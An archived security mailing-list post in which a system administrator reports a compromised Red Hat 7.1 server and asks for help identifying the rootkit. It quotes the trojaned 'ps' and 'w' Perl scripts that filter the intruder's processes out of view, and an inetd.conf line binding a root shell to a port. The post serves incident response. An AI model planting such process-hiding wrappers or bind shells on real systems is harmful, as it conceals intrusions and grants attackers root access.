hi i found today something funny happening when i tried to install a web server on a customer's machine: 1. w - returned some weird "/usr/bin/perl" processes 2. ps - was not showing everything 3. two connections to some irc servers; fuser - finding the process id's for them, but ps not showing them some infos about the server (unfortunately it wasnt installed by me...): [root@www root]# uname -a Linux www 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 2001 i686 unknown (compiled in the future too, lol) [root@www /root]# cat /etc/redhat-release Red Hat Linux release 7.1 (Seawolf) more digging... so i found some modified files: [root@www nouser]# ls -l /bin/ps -rwxr-xr-x 1 nouser nouser 188 Mar 2 15:45 /bin/ps [root@www /root]# cat /bin/ps #!/usr/bin/perl $xargs =join(' ',@ARGV); $ps = `/usr/lib/libxnotps $xargs \| grep -v nouser \| grep -v noshell \| grep -v proftp \| grep -v \"/bin/ps\" \| grep -v libxnotps`; print "$ps"; [root@www /root]# ls -l /usr/lib/libxnotps -r-xr-xr-x 1 root root 64092 Apr 5 2001 /usr/lib/libxnotps [root@www nouser]# ls -l /usr/bin/w -rwxr-xr-x 1 nouser nouser 105 Jan 20 01:03 /usr/bin/w [root@www /root]# cat /usr/bin/w #!/usr/bin/perl $xargs =join(' ',@ARGV); $w = `/usr/lib/libxyotps $xargs \| grep -v nouser`; print "$w"; [root@www /root]# ls -l /usr/lib/libxyotps -r-xr-xr-x 1 root root 8688 Apr 5 2001 /usr/lib/libxyotps there is another file called /usr/lib/libxzotps, but i couldnt find what is pointing at that, yet no reference found on the web, searching for "libxnotps" or "libxnotps" or "libxzotps" [root@www nouser]# grep nouser /etc/passwd nouser:x:502:502::/sbin/nouser:/bin/bash [root@www nouser]# ls -l /sbin/nouser total 3328 -rw-r--r-- 1 nouser nouser 80092 Mar 2 23:22 broadcast-5000.log -rw-r--r-- 1 nouser nouser 3057793 Mar 2 23:22 broadcast-full.log drwxr-xr-x 2 nouser nouser 4096 Mar 2 13:01 Desktop drwxrwxr-x 4 nouser nouser 4096 Mar 5 19:23 iroffer -rw-rw-r-- 1 nouser nouser 206865 Mar 5 19:23 iroffer.tar.gz -rwsr-xr-x 1 root root 13855 Mar 2 13:04 nouser -rw-rw-r-- 1 root root 2215 Mar 2 23:23 packet0r.pl drwxrwxr-x 3 nouser nouser 4096 Jan 20 01:15 scan-1 drwxr-xr-x 3 nouser root 4096 Mar 2 13:04 scan-2 drwxr-xr-x 3 nouser root 4096 Mar 2 13:04 scan-3 drwxrwxr-x 3 nouser nouser 4096 Jan 20 01:13 war of course the suid "nouser" gives a root shell... and the directories are full of war scripts, flood tools, and warez... given away through irc bots i have scanned the machine using chkroot kit... the only funny thing found was an inetd.conf, containing: [root@www nouser]# cat /etc/inetd.conf 65456 stream tcp nowait root /bin/sh sh of course, inetd is not installed :) that points me to the idea that the process was somehow automated... but i cant find any reference to a rootkit that does these changes. seems pretty stupid for a rootkit anyway... but i want to be sure no other major changes were made... before i install the production server there. thanks for any comments ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Sun Mar 10 2002 - 17:10:24 PST